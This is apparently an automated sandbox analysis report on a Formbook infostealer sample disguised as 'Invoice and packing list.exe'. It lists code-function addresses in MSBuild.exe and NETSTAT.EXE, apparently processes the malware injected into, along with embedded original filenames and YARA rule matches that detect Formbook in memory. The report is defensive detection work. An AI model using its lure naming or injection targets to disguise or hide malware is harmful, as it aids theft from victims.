Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01550770	15_2_01550770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0154C7C0	15_2_0154C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0156C6E0	15_2_0156C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01566962	15_2_01566962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0161A9A6	15_2_0161A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015529A0	15_2_015529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01552840	15_2_01552840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0155A840	15_2_0155A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0157E8F0	15_2_0157E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015368B8	15_2_015368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160AB40	15_2_0160AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01606BD7	15_2_01606BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0154EA80	15_2_0154EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0155AD00	15_2_0155AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0154ADE0	15_2_0154ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01568DBF	15_2_01568DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01550C00	15_2_01550C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01540CF2	15_2_01540CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015F0CB5	15_2_015F0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015C4F40	15_2_015C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01570F30	15_2_01570F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01592F28	15_2_01592F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01542FC8	15_2_01542FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0155CFE0	15_2_0155CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015CEFA0	15_2_015CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01550E59	15_2_01550E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160EE26	15_2_0160EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160EEDB	15_2_0160EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01562E90	15_2_01562E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160CE93	15_2_0160CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0161B16B	15_2_0161B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0153F172	15_2_0153F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0158516C	15_2_0158516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0155B1B0	15_2_0155B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160F0E0	15_2_0160F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_016070E9	15_2_016070E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015FF0CC	15_2_015FF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015570C0	15_2_015570C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0153D34C	15_2_0153D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160132D	15_2_0160132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0159739A	15_2_0159739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0156B2C0	15_2_0156B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015F12ED	15_2_015F12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015552A0	15_2_015552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01607571	15_2_01607571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015ED5B0	15_2_015ED5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01541460	15_2_01541460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160F43F	15_2_0160F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160F7B0	15_2_0160F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_016016CC	15_2_016016CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01559950	15_2_01559950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0156B950	15_2_0156B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015BD800	15_2_015BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015538E0	15_2_015538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160FB76	15_2_0160FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0158DBF9	15_2_0158DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015C5BF0	15_2_015C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0156FB80	15_2_0156FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01607A46	15_2_01607A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160FA49	15_2_0160FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015C3A6C	15_2_015C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015FDAC6	15_2_015FDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015EDAAC	15_2_015EDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01595AA0	15_2_01595AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01607D73	15_2_01607D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01553D40	15_2_01553D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01601D5A	15_2_01601D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0156FDC0	15_2_0156FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015C9C32	15_2_015C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160FCF2	15_2_0160FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160FF09	15_2_0160FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01551F92	15_2_01551F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160FFB1	15_2_0160FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01559EB0	15_2_01559EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D92167	16_2_00D92167
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D91715	16_2_00D91715
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039503E6	16_2_039503E6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0389E3F0	16_2_0389E3F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394A352	16_2_0394A352
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039102C0	16_2_039102C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03930274	16_2_03930274
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039501AA	16_2_039501AA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039481CC	16_2_039481CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03880100	16_2_03880100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0392A118	16_2_0392A118
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03918158	16_2_03918158
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0388C7C0	16_2_0388C7C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038B4750	16_2_038B4750
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03890770	16_2_03890770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038AC6E0	16_2_038AC6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03950591	16_2_03950591
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03890535	16_2_03890535
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0393E4F6	16_2_0393E4F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03942446	16_2_03942446
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03946BD7	16_2_03946BD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394AB40	16_2_0394AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0388EA80	16_2_0388EA80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038929A0	16_2_038929A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0395A9A6	16_2_0395A9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038A6962	16_2_038A6962
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038768B8	16_2_038768B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038BE8F0	16_2_038BE8F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0389A840	16_2_0389A840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03892840	16_2_03892840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0390EFA0	16_2_0390EFA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03882FC8	16_2_03882FC8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0389CFE0	16_2_0389CFE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038D2F28	16_2_038D2F28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038B0F30	16_2_038B0F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03904F40	16_2_03904F40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394CE93	16_2_0394CE93
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038A2E90	16_2_038A2E90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394EEDB	16_2_0394EEDB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394EE26	16_2_0394EE26
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03890E59	16_2_03890E59
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038A8DBF	16_2_038A8DBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0388ADE0	16_2_0388ADE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0389AD00	16_2_0389AD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03930CB5	16_2_03930CB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03880CF2	16_2_03880CF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03890C00	16_2_03890C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038D739A	16_2_038D739A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394132D	16_2_0394132D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0387D34C	16_2_0387D34C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038952A0	16_2_038952A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038AB2C0	16_2_038AB2C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039312ED	16_2_039312ED
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0389B1B0	16_2_0389B1B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C516C	16_2_038C516C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0387F172	16_2_0387F172
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0395B16B	16_2_0395B16B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038970C0	16_2_038970C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0393F0CC	16_2_0393F0CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394F0E0	16_2_0394F0E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039470E9	16_2_039470E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394F7B0	16_2_0394F7B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_039416CC	16_2_039416CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0392D5B0	16_2_0392D5B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03947571	16_2_03947571
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394F43F	16_2_0394F43F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03881460	16_2_03881460
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038AFB80	16_2_038AFB80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03905BF0	16_2_03905BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038CDBF9	16_2_038CDBF9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394FB76	16_2_0394FB76
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038D5AA0	16_2_038D5AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0392DAAC	16_2_0392DAAC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0393DAC6	16_2_0393DAC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03947A46	16_2_03947A46
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394FA49	16_2_0394FA49
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03903A6C	16_2_03903A6C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03899950	16_2_03899950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038AB950	16_2_038AB950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038938E0	16_2_038938E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038FD800	16_2_038FD800
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03891F92	16_2_03891F92
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394FFB1	16_2_0394FFB1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03853FD5	16_2_03853FD5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03853FD2	16_2_03853FD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394FF09	16_2_0394FF09
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03899EB0	16_2_03899EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038AFDC0	16_2_038AFDC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03893D40	16_2_03893D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03941D5A	16_2_03941D5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03947D73	16_2_03947D73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0394FCF2	16_2_0394FCF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_03909C32	16_2_03909C32
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6EAC3	16_2_02F6EAC3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F59E50	16_2_02F59E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F59E0A	16_2_02F59E0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6EFDF	16_2_02F6EFDF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F52FB0	16_2_02F52FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F52D90	16_2_02F52D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6D580	16_2_02F6D580
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6E524	16_2_02F6E524
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036FA036	16_2_036FA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F5B32	16_2_036F5B32
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F5B30	16_2_036F5B30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036FB232	16_2_036FB232
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F8912	16_2_036F8912
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F1082	16_2_036F1082
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F2D02	16_2_036F2D02
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036FE5CD	16_2_036FE5CD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01597E54 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 015CF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 015BEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0153B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01907E54 appears 97 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01585130 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0192EA12 appears 37 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0390F290 appears 105 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 038C5130 appears 37 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 038FEA12 appears 86 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0387B970 appears 272 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 038D7E54 appears 98 times

Source: Invoice and packing list.exe, 00000000.00000002.2068651058.0000000008CC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Invoice and packing list.exe
Source: Invoice and packing list.exe, 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Invoice and packing list.exe
Source: Invoice and packing list.exe, 00000000.00000002.2068007786.0000000006D60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Invoice and packing list.exe
Source: Invoice and packing list.exe, 00000000.00000002.2057623541.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Invoice and packing list.exe
Source: Invoice and packing list.exe, 00000000.00000000.2010985123.00000000007B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFYSY.exe0 vs Invoice and packing list.exe
Source: Invoice and packing list.exe, 00000000.00000002.2064262392.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Invoice and packing list.exe
Source: Invoice and packing list.exe	Binary or memory string: OriginalFilenameFYSY.exe0 vs Invoice and packing list.exe

Source: Invoice and packing list.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
